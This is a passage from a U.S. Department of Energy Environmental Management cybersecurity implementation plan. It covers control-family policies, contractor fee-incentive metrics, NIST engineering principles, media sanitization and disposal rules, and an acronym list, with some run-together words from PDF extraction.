Scope: These security controls are pertinent to DOE EM personnel, contractor or queststo DOE EM or contractor facilities. The sites must make provisions for HSPD-12implementation by 2012.
Roles: Site Management, Program Managers, ISSO, ISSM, and SAs must make sure thataccess by individuals or processes follow approved policies and procedure and areperiodically checked for current processing validity.
Responsibilities: The organizations’ Program Management must participate in ensuringthat individuals are assigned to the proper functional groups or have access to only thosefunctions that are required for their roles and responsibilities (least privilege). The ISSOand ISSM must be part of the process to assign, review and approve individuals or systemprocesses access levels. Guest Accounts must follow the same procedures and have alimited access and a defined termination date.
Management Commitment: Site Management must ensure that issuance of authenticatorand IDs follow approved process, and that IDs must be monitored and revoked upontermination, transfer, or organizational changes. Management is encouraged to performthese tasks by automated means.
Coordination: The Program Managers, ISSO, and SAs must coordinate their efforts toensure that authenticators are issued properly, needed, currently valid, terminated whennot required, and provide least functionality.
Compliance: The site needs to comply with NIST FIPS 201 and use the following asguidance: SP 800-63,800-73,800-76,800-78, and 800-100.
IR-1 Incident Response
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
249 of 266
Purpose: Incident Response controls are utilized to detect, analyze, prioritize, correct andrestore system functionality from unauthorized or nefarious actions by external orinternal personnel. These controls provide a process by which suspicious or actualunauthorized actions can be addressed to prevent further damage, infection of additionalsystems and centralized reporting mechanisms.
Scope: Incident Response can be by system, accreditation boundary, or site and mustaddress DOE and contractor systems. All significant incidents must be shared andcoordinated with other operating programs such as DOE JC3 and US-ComputerEmergency Response Team (CERT).
Roles: The organizations’ CIO, program managers, IT/DBMS technical support staff,SAs, ISSO, and ISSM are responsible for developing, monitoring, tracking incidents,conducting exercises and training for incidents.
Responsibilities: The appointed Computer Security Incident Response Team(s)(CSIRTs) and the ISSO/ISSM are responsible for creating policies and procedures thatwill detect, analyze, prioritize and restore system functions to normal.
Management Commitment: The organizations’ management must provide the resources,personnel, and necessary training and exercises to produce an effective incident responsecapability to meet DOE JC3 and US-CERT standards. These policies and procedureswill enable sites to meet their DOE mission parameters. They must coordinate incidentinformation to other operating groups (DOE JC3 and US-CERT) in a timely and correctlyformatted report.
Coordination: The organization must coordinate all confirmed incidents to their otheroperating groups such as DOE JC3 and US-CERT, as appropriate.
Compliance: The sites must comply with its define IR procedures, RMAIP, US-CERTand local law enforcement policies.
MA-1 Maintenance
Purpose: The purpose of this control is to prevent either the intentional or unintentionalchanges resulting from system maintenance/maintenance personnel that could open thesecure baselines, grant unauthorized access/changes, or cause damage to the systems.These controls also ensure that the systems are maintained at the current level of securitybaselines, repairs, patches, and approved CCB changes.
Scope: This control covers all DOE EM site contractor or vendor maintenance personnel.This control family also covers remote maintenance services whether DOE, sitecontractor, or vendor personnel.
Roles: The ISSO is primarily responsible for these procedures, in addition to monitoringand documenting.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
250 of 266
Responsibilities: The ISSO must create policies and procedures to perform standardhardware and software maintenance, monitor system changes, perform oversight ofsite/remote maintenance processes, and document all results. The ISSO must test allsignificant changes to ensure they haven’t changed the systems security posture. Further,the ISSO must ensure that maintenance tools do not alter the systems security.
Management Commitment: The organizations’ management must provide sufficientresources to ensure that site hardware, software, and other electronic components areidentified, catalogued, monitored, maintained, and documented. These efforts will ensurethat the latest security baselines, patches, and equipment repairs do not alter or makevulnerable the secure state of the systems or electronic components.
Coordination: The ISSO must coordinate the schedule for equipment repairs, patching,baseline builds, security testing, and monitoring security impact of any and all changes.The ISSO must determine if site maintenance or vendor tools may be used on theequipment.
Compliance: The sites must comply with the RMAIP.
MP-1 Media Protection
Purpose: This control is used to secure the handling, processing, data at rest storagerequirements, and transport of sensitive information on both electronic and hard copyitems.
Scope: This control applies to all DOE EM site personnel, on site contractors, personalcomputers, telephonic, and videoconference services and site assessors. This controlapplies to all unclassified, NSS, PII and appropriate/designated contractor material.
Roles: The ISSO, information owner, and EM CSPM all share responsibility for thiscontrol.
Responsibilities: The ISSO must develop a list of sensitive materials, their sensitivitylevels, and the system location. The ISSO must put in place access controls, leastprivilege functions, access monitoring and alerting of inappropriate or unauthorizedaccess, processing, printing, or copying of such sensitive materials. Encryptiontechniques must be used on PII and above information. The ISSO must ensure thatsensitive information removed from the facility is logged, monitored, and encrypted. Thesite will institute measures to actively monitor the transfer or copying of sensitiveinformation onto mobile devices of any kind. The ISSO must ensure that after the mediais no longer needed for its appropriate use—end-of-life—it must be securely erased,verified clean, or destroyed.
Management Commitment: The organizations’ management must ensure that securityprocesses for handling and marking for electronic, hard copy, and removable media arein-place and enforced. Management must ensure that the necessary mechanisms to
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
251 of 266
inventory, track, mark, and monitor mobile or hardcopy sensitive data, including itsdestruction are in place.
Coordination: The ISSO must coordinate with the information owner to determine thesensitivity of information. The site must coordinate with all project groups to ensure themedia sensitive material safeguard policies, procedures, and notifications are followed.
Compliance: All media must be appropriately identified, marked, and handled inaccordance with DOE policies, this RMAIP, and NIST SP 800-88 (as modified),Guidelines for Media Sanitization..
PE-1 Physical and Environmental
Purpose: This security control is meant to provide the policies and procedures forprotective measures employed by physical and environmental safeguards at the site. Thecontrols address access, environmental safeguards for IT equipment, alternative worksites, and delivery/removal of equipment.
Scope: These controls apply to all DOE EM or contractor run sites. All accreditationboundaries within a site must provide these physical and environmental safeguards.
Roles: Human Resources, Security and IT personnel are involved in these controls.
Responsibilities: The organizations’ HR department is responsible for the processes thatinvolve personnel procedures to verify, issue, monitor, and revoke badge access. Theorganizations’ security personnel will be responsible for access and visitor controlincluding credential verification, recording, monitoring, and escort information. The ITstaff must provide secure access to IT rooms, environmental (HVAC and water)monitoring and cabling protection.
Management Commitment: Management will be responsible for coordinating thepolicies and processes to guarantee that personnel access controls, environmentalprotections, and IT controls are in place and operating.
Coordination: The ISSO and ISSM must coordinate with HR, IT, and Security staffs tomake sure that the controls are implemented, correct, and producing the required resultsin all the physical sites and accreditation boundaries.
Compliance: The site must ensure that they meet all appropriate DOE policy, RMAIP,and local laws and requirements for physical and environmental codices.
PL-1 Planning
Purpose: Security planning addresses the adequacy of security controls to provide risk-based levels of safeguards for the confidentiality, integrity, and availability of the sitespersonnel, mission data, PII and IT equipment. These controls encompass management,
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
252 of 266
operational, and technical safeguards to adequately meet the sites acceptable level of risk.This security planning information is captured in the system security plan (SSP).
Scope: Planning applies to all DOE EM sites and contractor sites. In general, anyaccreditation boundary that collects, generates, processes, stores, or communicates DOEEM data is subject to this control.
Roles: The ISSO, AODR and AO all share responsibility for this control.
Responsibilities: The ISSO is responsible for the creation, implementation, and update ofthe security controls planning document (SSP). The AO or AODR needs to review andapprove the SSP based on acceptable levels of risk, mission requirements, and the NISTRisk Management Framework.
Management Commitment: The sites’ management must ensure that each accreditationboundary has the requisite SSP. Management must also ensure that it meets the intent ofNIST’s Risk Management Framework and the Systems Development Life Cycle.Management must enforce policies and procedures required for security planning.
Coordination: The ISSO must coordinate with all site personnel, AODR, and AO in thecompilation, execution, update, and documentation of the SSP.
Compliance: The site needs to comply with all applicable DOE Orders, OMBMemorandum 03-22, and NIST SP 800-18 (as modified) requirements.
PS-1 Personnel Security
Purpose: This control family applies to the position categorization, backgroundscreening, clearances, termination, transfer and access agreements, and personnelsanctions. This control family is vital to preventing unwanted insider personnelviolations. It is also essential for personnel with elevated privileges.
Scope: This control applies to all DOE EM and contractor personnel that have access toDOE EM systems, networks, and data.
Roles: The ISSO, Program Mangers and HR all share responsibility for this control.
Responsibilities: The sites’ HR must create a position categorization that includes aposition description, tasking, level of access (least privilege), background investigationlevels, clearances, termination, and transfer checklists for all personnel. The ISSO mustcoordinate with the Program Managers and HR to validate all these functions are correctand complete prior to granting access to the network and DOE EM data. Any personneltransfers or terminations must be immediately reported to the ISSO.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
253 of 266
Management Commitment: Site management must ensure that position descriptions,level of background investigations (screening), and personnel actions (terminations,transfer, and sanctions) are in compliance with the sites personnel security requirements.
Coordination: The sites’ HR, Program Managers, and the ISSO must coordinate to makesure that all these requirements are in place and met prior to granting access to anyindividual to DOE EM networks or data.
Compliance: The ISSO and ISSM must make sure that all the sites’ personnel proceduresare adhered to prior to granting access to DOE EM data or networks.
RA-1 Risk Assessment
Purpose: The purpose of a risk assessment is to ensure that in place security controls areimplemented correctly, operating as intended and producing the correct output to protectthe system, data and personnel. The risk assessments family of controls evaluatesvulnerabilities, threat sources, and security controls planned or in place to determine thelevel of residual risk (acceptable risk) posed to organizational operations and assets,individuals, and other organizations based on the operation of the information system.The in place controls selected must be commensurate with the risk, likelihood, andimpact of potential harm.
Scope: Risk assessments (either formal and informal) are to be conducted by all DOEEM sites or contractor-operated sites by using the DOE RMA and NISTT RMFincluding: information system categorization, security control selection, security controlimplementation, security control assessment, information system authorization, andsecurity control monitoring.
Roles: The AO, AODR, ISSO, ISSM, system owner, and information steward all shareresponsibility for this control.
Responsibilities: The ISSO and system owner must create a risk assessment strategy thattakes into consideration the magnitude of harm resulting from unauthorized access, use,disclosure, disruption, modification, or destruction of the information system and theinformation it processes, stores, or transmits. The ISSO must perform periodic riskassessments and scans to determine if components (hardware or software),organizational, environmental changes, or emerging threats have created newvulnerabilities.
The AO/AODR must review and approve the risk assessment strategy, testingmethodology, and risk assessment results (acceptable level of risk).
Management Commitment: The organizations’ management must make sure that riskassessments are conducted.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
254 of 266
Coordination: The ISSO must coordinate with the system owner and information stewardon the sensitivity of data and the level of protection required.
Further, the ISSO must coordinate the risk strategy with all interconnected siteboundaries and sub-boundaries.
Compliance: The sites must comply with the provisions of appropriate DOE policy,RMAIP, and NIST 800-30 (as modified).
SA-1 System and Services Acquisition
Purpose: The purpose of this family of controls is to ensure that sufficient resources areallocated for the site to follow the SDLC (initiation through termination) systemcomponents, including: ensuring that security requirements are defined in procurementterms and conditions, that software licenses are not exceeded, that software developersincorporate security practices in developing programs, and that users are not alloweddesktop installation privileges.
Scope: This family applies to all DOE procurements for site or contractor purchases.
Roles: This is a collaborative effort between purchasing, contracts, and the ISSO.
Responsibilities: The ISSO and ISSM must ensure that any specific securityrequirements, enterprise architecture needs, checklist conformance certificates,documentation, and license conditions are incorporated in system componentprocurements.
Contracts and purchasing must create, document, and maintain the minimum terms andconditions for procurement of system components. These groups must coordinate withthe ISSO for review prior to issuing any system components.
Management Commitment: The site manager must ensure that sufficient funding isavailable to support the system accreditation boundary from initiation to shut down. Thisincludes a line item in the yearly budget for security operations. Site management mustensure that all operating groups follow the same procurement and security rules.
Coordination: The ISSO, contracts, and purchasing groups must coordinate on all systemcomponent purchases to make sure they meet the security specifications, terms andconditions, and conformance clauses.
Compliance: The site and individual operating groups must comply with all procurementand legal terms and conditions when procuring system or network components.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
255 of 266
SC-1 System and Communication Protection
Purpose: This control family is meant to address system and network policies andprocedures. Its intent is to provide “defense in depth” for both systems and networks.This approach provides safeguards within safeguards to make unauthorized access, use ormodification of system or network operations more difficult.
Scope: The SC family of controls applies to all DOE EM and contractor systems thatcontain or have access to DOE EM networks or data.
Roles: The ISSO and SAs share responsibility for this control
Responsibilities: The ISSO and SAs must implement, monitor, and periodically test thecontrols for system protection (application partitioning, security function isolation, DOS,mobile code, public access protection, DNS protection, data at rest protection) andnetwork security protection (boundary protection, transmission confidentiality,cryptographic functions, collaborative computing devices and VoIP).
Management Commitment: The organizations’ management must ensure thatprocedures, resources, and personnel are available to implement both system and networksecurity protection mechanisms.
Coordination: The ISSO must coordinate with all accreditation boundaries to ensure thesystem and network controls are in place, functioning and meeting the requirements.
Compliance: The sites must comply with appropriate DOE policy, RMAIP, and NISTFIPS 199 and 200 and guidance in NIST SP 800-52, 800-58, 800-77, and 800-81(asmodified).
SI-1 System and Information Integrity
Purpose: This family of controls is about discovering, preventing, repairing, monitoring,and correcting vulnerabilities and threats within the sites systems and networks.
Scope: The SC family of controls applies to all DOE EM and contractor systems andtheir associated accreditation boundaries.
Roles: ISSO and SAs
Responsibilities: The ISSO and SAs must design, implement, and monitor procedures toprotect against malicious code monitoring, flaw remediation, security alerting, SPAMprotection, error handling, and input verification and validation.
Management Commitment: The site management must implement the system andinformation integrity protections stated in the SSP.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
256 of 266
Coordination: The ISSO must coordinate with all SAs to ensure that all accreditationboundaries follow the necessary procedures for system and information integrity.
Compliance: All DOE EM and contractor systems must comply with appropriate DOEpolicy, RMAIP, and NIST SP 800-40 (as modified).
PM-1 Program Management
FISMA requires organizations to develop and implement an organization-wideinformation security program to address information security for the systems andinformation that supports the operations and assets of the organization, including thoseprovided or managed by another organization, contractor, or other source.
Purpose: The PM family of controls focuses on the organization-wide informationsecurity requirements that are independent of any particular information system and yetare essential for managing information security programs. These security controls areimplemented, monitored, and tested at the division or agency level. Some portion ofthese controls will require the subordinate groups to provide “roll up” information. Thesubordinate groups must be responsible for providing the requisite information.
Scope: The organization must document program management controls in theinformation security program plan (or similar document). The organization-wideinformation security program plan supplements the individual security plans developedfor each organizational information system. Together, the security plans for theindividual information systems and the information security program cover the totality ofsecurity controls employed by the organization.
In addition to documenting the information security program management controls, thesecurity program plan provides a vehicle for the organization, in a central repository(eGov RPM) to document all security controls implementation, testing, authorization, andcompliance. The reporting organization must be responsible for supplying and updatinginformation in the eGov RPM system.
Roles: Organizations specify the individuals within the organization responsible for thedevelopment, implementation, assessment, authorization, and monitoring of theinformation security program management controls. At a minimum, these must be thesenior agency information security officer, risk executive, AO (may be designated), andeach divisional level CSPM.
Responsibilities: The information security program management controls and programmanagement common controls contained in the information security program plan areimplemented, assessed for effectiveness, and authorized by a senior agency ororganizational official with the same or similar authority and responsibility for managingrisk as the authorization officials for information systems. This individual will havemission, monetary, and resource control. Further, this person will be responsible forsetting acceptable levels of risk.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
257 of 266
POA&Ms must be developed and maintained for the program management and commoncontrols that are deemed through assessment to be less than effective. Informationsecurity program management and common controls are also subject to the samecontinuous monitoring requirements as security controls employed in individualorganizational information systems.
Management Commitment: The organization management must appoint a senior agencyinformation security officer, provide information resources and documentation (Exhibits300 and 53), maintain a POA&M database, establish and maintain inventory control,develop and maintain security performance metrics, establish a mission criticalinfrastructure plan, and provide a risk management strategy, a defined securityauthorization process, and a mission/business process definition.
Coordination: The organization will be responsible for the coordination of programmanagement by distributing the necessary program management documentation, trainingas appropriate and monitoring agreed upon security controls and procedures forcompliance and effectiveness. The program management group must coordinate withsubordinate groups to ensure they are aware of, have implemented, are compliant, andprovide the required “roll up” information to program management requirements.
Compliance: The agency and associated divisions must comply with NIST FIPS 199 and200 as well as NIST SP 800-53 (as modified), Appendix G, Information SecurityPrograms.
Appendix D – EM Contractor Requirements
EM contractors are required to comply with requirements set forth in DOE O 205.1B,Chg.2, Department of Energy Cyber Security Program, Attachment 1, ContractorRequirements Document (CRD). A Contractor-developed, Risk Management Approachmust be consistent with the requirements of this RMAIP.
Suggested Metrics for Fee Determination
Contracting Officers should work with site IT/cyber security personnel to developmetrics for fee determination consistent with DOE’s fee policies and the terms of asubject contract. This table is not mandatory but could be used to help develop andinclude any additional metrics based on site specific requirements.
Requirements Below ExpectationsMeets
ExpectationsExceeds Expectations
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
258 of 266
Unless otherwise noted, thefollowing incentives or
disincentives must be applied.The contracting officer has the
flexibility to adjust the rates/feeson a contract by contract basis.
Reduce fee by 1-2% No change to fee Increase fee by 0.25%
Type I
Incidents are notreported uponoccurrence.
Reduce fee by 10-15%.
Incidents arereported asrequired.
No change to fee.
A reported incident isproven to prevent a
similar incident at anotherDOE site. Increase fee by
0.5%.
Type IIIncidents are not
reported uponoccurrence.
Incidents arereported asrequired.
A reported incident isproven to prevent a
similar incident at anotherDOE site.
Increase fee by 0.25%.
Protected PII
Incident is not reportedupon occurrence as
required.Reduce fee by 2-3%.
Incidents arereported asrequired.
Protected PII is detectedand prevented from
leaving the site.Increase fee by 0.5%.
Overdue POA&Ms Reduce fee by 1-2%. No change to fee. N/A
User Awareness Training 1:Less than 90% of users
trained annually.100% of users
trained annually.
100% of users trainedsemi-annually
Increase fee by .5% up to$50K max/year.
User Access
Users are providedaccess to the network
before completingtraining.
Users are providedaccess to thenetwork after
completing usertraining.
Users are provided accessto the network after
completing user training.Completion of the training
requires users tosuccessfully pass a
contractor-developed test.Increase fee by .5% up to
$50K max/year.
Privileged Users AwarenessTraining
100% of privilegedusers are trained
annually. At least 25%hold a current industry
recognizedcertification.
100% of privilegedusers are trained
annually and 33%hold a current
industry recognizedcertification.
100% of privileged usersare trained annually and
66% hold a currentindustry recognized
certification.
Maintaining eGov RPM
Documents notuploaded into the
system or not updatedat least bi-annually.Updates should be
noted in the record ofchanges. Modified
documents should bere-uploaded into the
system.
Documents areuploaded at least
bi-annually into thesystem.
No change in fee.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
259 of 266
Requirements Below ExpectationsMeets
ExpectationsExceeds Expectations
Unless otherwise noted, thefollowing incentives or
disincentives must be applied.The contracting officer has the
flexibility to adjust the rates/feeson a contract by contract basis.
Reduce fee by 1-2% No change to fee Increase fee by 0.25%
PatchingPatches are older than
30 days fromrelease/notice.
Patches areinstalled between11 and 30 days
from release/notice.
Patches are installed lessthan 10 days from
release/notice.
Maintaining BaselineConfigurations – OS(FDCC for Windows
XP/VISTA/Win7)
Less than 85% of allsystems use the
standard baselineconfiguration without
deviation.
85% of all systemsuse the standard
baselineconfiguration
without deviation.
100% of applicationsoperate without deviation
to any baselineconfiguration settings.
Maintaining BaselineConfigurations - Apps
Less than 85% of allapplications use the
recommended securitybaseline configuration
settings.
85% of allapplications use the
recommendedsecurity baseline
configurationsettings.
100% of all applicationsuse the recommended
security baselineconfiguration settings.
Maintaining a System InventoryNo inventory of major
IT hardware andsoftware exists.
An up-to-dateinventory of majorIT hardware andsoftware exists.
A real-time or near real-time automated inventoryof major IT hardware and
software exists.Government Provided
Enterprise Solutions & SiteAssessments – The contractor isto cooperate in the deployment ofGovernment provided enterprise
solutions for the purposes ofprotecting IT resources and all
Site Assessments
Contractor does notcooperate with the
deployment.Reduce fee accordingly
or take otherappropriate actions
Full cooperation. No change in fee.
Sharing of infrastructure and ITsolutions – the contractor is to
cooperate with other EM supportcontractors in the development
and deployment of IT solutions inorder to save energy and funding.
Contractor does notcooperate.
Reduce fee by 5%.Full cooperation.
Increase fee as determinedby the contracting officer.
Definitions:
Below expectations – The rating assigned to a contractor that has failed to meet any ofthe defined requirements as deemed by the Certification Agent, the Contracting Officer,or the Federal Task Manager
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
260 of 266
Meets expectations – The rating assigned to a contractor that has met the definedrequirements as deemed by the Certification Agent, the Contracting Officer, or theFederal Task Manager
Exceeds expectations – The rating assigned to a contractor that has exceeded the definedrequirements as deemed by the Certification Agent, the Contracting Officer, or theFederal Task Manager and has not had a below expectations within the last two years.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
261 of 266
Appendix E – NIST 800-27 Rev A Engineering Principles
This appendix is guidance to enable sites to comply with NIST 800-53 Rev 4, controlSA-8, Engineering Principles. One check “” signifies the principle can be used to supportthe life-cycle phase, and two checks “” signifies the principle is key to successfulcompletion of the life-cycle phase.
Principle Initiation Devel/Acquis Implement Oper/Maint DisposalDoes your organization perform any of thefollowing principle activities during any of partof the system development life cycle listed to theright? If yes, highlight the appropriate box forthe corresponding phase yellow, otherwise leaveblank.1 Establish a sound security policy as the
“foundation” for design
2 Treat security as an integral part of the overallsystem design
3 Clearly delineate the physical and logical securityboundaries governed by associated securitypolicies
4 (formerly 33) Ensure that developers are trainedin how to develop secure software
5 (formerly 4) Reduce risk to an acceptable level 6 (formerly 5) Assume that external systems are
insecure
7 (formerly 6) Identify potential trade-offs betweenreducing risk and increased costs and decrease inother aspects of operational effectiveness.
8 Implement tailored system security measures tomeet organizational security goals.
9 (formerly 26) Protect information while beingprocessed, in transit, and in storage
10 (formerly 29) Consider custom products toachieve adequate security
11 (formerly 31) Protect against all likely classes of“attacks”
12 (formerly 18) Where possible, base security onopen standards for portability and interoperability
13 (formerly 19) Use common language indeveloping security requirements
14 (formerly 21) Design security to allow for regularadoption of new technology, including a secureand logical technology upgrade process
15 (formerly 27) Strive for operational ease of use 16 (formerly 7) Implement layered security (Ensure
no single point of vulnerability)
17 (formerly 10) Design and operate an IT system tolimit damage and to be resilient in response
18 (formerly 13) Provide assurance that the systemis, and continues to be, resilient in the face ofexpected threats
19 (formerly 14) Limit or contain vulnerabilities
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
262 of 266
Principle Initiation Devel/Acquis Implement Oper/Maint DisposalDoes your organization perform any of thefollowing principle activities during any of partof the system development life cycle listed to theright? If yes, highlight the appropriate box forthe corresponding phase yellow, otherwise leaveblank.20 (formerly 16) Isolate public access systems from
mission critical resources (e.g., data, processes,etc.)
21 (formerly 17) Use boundary mechanisms toseparate computing systems and networkinfrastructures
22 (formerly 20) Design and implement auditmechanisms to detect unauthorized useand to support incident investigations
23 (formerly 28) Develop and exercise contingencyor disaster recovery procedures to ensureappropriate availability
24 (formerly 9) Strive for simplicity 25 (formerly 11) Minimize the system elements to be
trusted
26 (formerly 24) Implement least privilege. 27 (formerly 25) Do not implement unnecessary
security mechanisms
28 (formerly 30) Ensure proper security in theshutdown or disposal of a system
29 (formerly 32) Identify and prevent common errorsand vulnerabilities
30 (formerly 12) Implement security through acombination of measures distributed physicallyand logically
31 (formerly 15) Formulate security measures toaddress multiple overlapping informationdomains
32 (formerly 22) Authenticate users and processes toensure appropriate access control decisions bothwithin and across domains
33 (formerly 23) Use unique identities to ensureaccountability
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
263 of 266
Appendix F – Sanitization and Disposal of Media and MobileDevices
Sanitization
Unclassified Removable Media
Removable media requires sanitization prior to removal from an EM site and thegovernment relinquishing title to the media when the media will be used again in otherenvironments (e.g., donations to schools or other charitable organizations, returningequipment to vendors after a trial)
If the media contained classified information then the media must be destroyed inaccordance with this RMAIP and applicable law and/or DOE policy, directive orguidance. The Committee on National Security Systems Policy No. 26 (CNSSP No. 26)requires that removable media be marked or labeled with the highest securityclassification of any system into which the media has been inserted. The threat ofobfuscation on electronic media makes prohibitive the capability of transferring filesfrom an NSS system thought to be unclassified to removable media and declassifying themedia based on the viewable contents of the files transferred. All media that has beeninserted in the NSS for any reason must be marked and handled at the same classificationof the NSS.
Approved methods of sanitization: Degaussing magnetic media Running a wipe program such as BCWipe at least three times
Approved methods of destruction: Shredding Grinding the surface Degaussing magnetic media and then breaking the media into small pieces
Mobile Devices
Mobile devices that do not contain magnetic storage (e.g., BlackBerries, cell phones) maybe wiped with a site-approved product designed for this purpose and then be excessed ordonated by the site. Testing of electronic storage has proven that wiping is an effectivemeans to ensure data can’t be obtained from the device once the process has beenperformed.
Laptops, if utilizing an approved full disk encryption solution, may also be wiped andexcessed or donated by the site. If the laptop has been known to have had classifiedinformation then the disk must be destroyed prior to the laptop being excessed ordonated.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
264 of 266
Classified Media
Clear all storage media that will be reused on a different system for the same or morerestrictive Information Group or a potential user that has a different Need-to-Know.
Use only overwriting software and hardware that are compatible with media to beoverwritten.
Protect cleared storage media that has been used in classified processing commensuratewith the highest Information Group (i.e., classification level and category of information)it has ever contained. The media must be handled in accordance with applicable DOEClassified Matter Protection and Control processes.
Purge classified storage media that will be reused in a less restrictive Information Group.
Destroy classified storage media that cannot be purged.
Identify the reuse of classified storage media in the SSP of the system where the media isused and track/control the media until it is purged or destroyed.
Individuals performing purging of classified storage media planned for reuse must certifythat the process has been successfully completed by affixing a label to the storage media.At a minimum, the label must document:
a. Storage media serial number, make and modelb. Most restrictive Information Group hosted prior to purgingc. Purpose of purgingd. A statement that the storage media contains no classified informatione. The procedure usedf. The date, printed name and signature of the certifier
Destruction
All media used in the classified program or that has been known to contain sensitiveinformation in significant quantity must be destroyed before leaving an EM site when atits end of life. The preferred method is to wipe and destroy if possible.
Approved methods of destruction:
Degaussing of drives Sanding the surfaces Shredding Grinding into fine particulate Burning
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
265 of 266
Acronym List
AA Application AdministratorAO Authorizing OfficialAODR Authorizing Official Designated RepresentativeATO Authority to OperateBIA Business Impact AssessmentC&A Certification and AccreditationCA Certification AgentCAO Continuous Authorization to OperateCCB Change Control BoardCI Counter-IntelligenceCIA Confidentiality (C), Integrity (I), and Availability (A)CIO Chief Information OfficerCM Continuous MonitoringCNSS Committee on National Security SystemsCNSSP No.26 The Committee on National Security Systems Policy No. 26CO Contracting OfficerCPU Central Processing UnitCSIRTs Computer Security Incident Response Team(s)CY Calendar YearDBA Database AdministratorDHS Department of Homeland SecurityDNS Domain Name SystemDNSSEC Domain Name System Security ExtensionsDOE Department of EnergyeGov RPM eGov Risk Portfolio Manager™EM Office of Environmental ManagementEMCSPM EM Cyber Security Program ManagerFedRAMP Federal Risk and Authorization Management ProgramFIPS Federal Information Processing StandardsFISMA Federal Information Security Management ActFRD Formerly Restricted DataFY Fiscal YearHQ HeadquartersHQSS Headquarters Security SystemHSPD Homeland Security Presidential DirectiveICS Industrial Control SystemsIEEE Institute of Electrical and Electronics EngineersIMC Information Management ConferenceIP Implementation PlanIPv6 Internet Protocol Version 6ISM industrial, Scientific, and MedicalISP Internet Service ProviderISSM Information System Security ManagerISSO Information System Security Officer
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP Version 5.1
266 of 266
IT Information TechnologyJC3 DOE Joint Cybersecurity CenterLMH Low (L), Moderate (M), and High (H)MIPP Mission Information Protection ProgramMTD Maximum Tolerable DowntimeNDA Network Device AdministratorNIST National Institute of Standards and TechnologyNSS National Security SystemsOMB Office of Management and BudgetPII Personally Identifiable InformationPIV Personal Identity VerificationPM Program ManagementPOA&M Plan of Action and MilestonesPSO Project Security OfficerPSP Program Security PlanRA Risk AssessmentRD Restricted DataRE Risk ExecutiveRMA Risk Management ApproachRMAIP Risk Management Approach Implementation PlanRPO Recovery Point ObjectiveRTO Recovery Time ObjectiveSAR Security Assessment ReportSDM Senior DOE ManagementSP Special PublicationsST&E Security Test and EvaluationSSP System Security PlanCUI Controlled Unclassified InformationTFNI Transclassified Foreign Nuclear InformationUCNI Unclassified Controlled Nuclear InformationUS-CERT US-Computer Emergency Response TeamVPN Virtual Private NetworkingWAN Wide Area NetworkingWIDS Wireless Intrusion Detection System
Top Related